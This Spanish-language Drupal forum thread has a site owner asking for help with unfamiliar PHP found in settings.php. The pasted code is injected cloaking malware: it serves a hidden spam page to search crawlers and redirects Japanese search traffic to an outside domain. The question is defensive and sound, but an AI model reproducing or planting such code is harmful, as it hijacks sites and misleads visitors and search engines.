Posted by jonn59 on October 10, 2017 at 1:51am
Hola a todos, recurro a ustedes por una situacion de seguridad que se me presento en mi plataforma Drupal 7,
Recientemente habilite un certificado para tener conexiones seguras(Https) pero al ingresar a mi archivo settings.php a realizar unos cambios me lleve la sorpresa de que habia una serie de lineas no propias de la instalación de Drupal, las lineas extrañsa son las siguientes:
<?php
$lan = $_SERVER['HTTP_ACCEPT_LANGUAGE'];
if (preg_match ( '/zh-cn/i', $lan)){
$url = 'http://www.baidu.com/';
header("location: " . $url);
exit();
}
error_reporting(0);
$ua = strtolower($_SERVER['HTTP_USER_AGENT']);
$rf=$_SERVER['HTTP_REFERER'];
$botchar = "/(googlebot|slurp|adsense)/";
if(preg_match($botchar, $ua)) {
$file = file_get_contents('sites/default/xxx.html');
echo $file;
exit;
}
if(stripos($rf,"yahoo.co.jp") || stripos($rf,"google.co.jp") || stripos($rf,"docomo.ne.jp"))
{
Header("Location: http://www.copy2017.org/");
exit;
}
?>Alguien podria darme luz que tipo de modificación realizaron en mi plataforma Drupal?
Categories: drupal7, seguridad, vulnerabilidad
Comments
Hola, donde lo tienes
Hola, donde lo tienes hospedado?
En un servidor interno de la
En un servidor interno de la UNAM
Checate estas
Checate estas slides
https://docs.google.com/presentation/d/1e0XnJRHJh8gDQjHYht_qYsFHiX2AEl5O...
Gracias, lo revisare
Gracias, lo revisare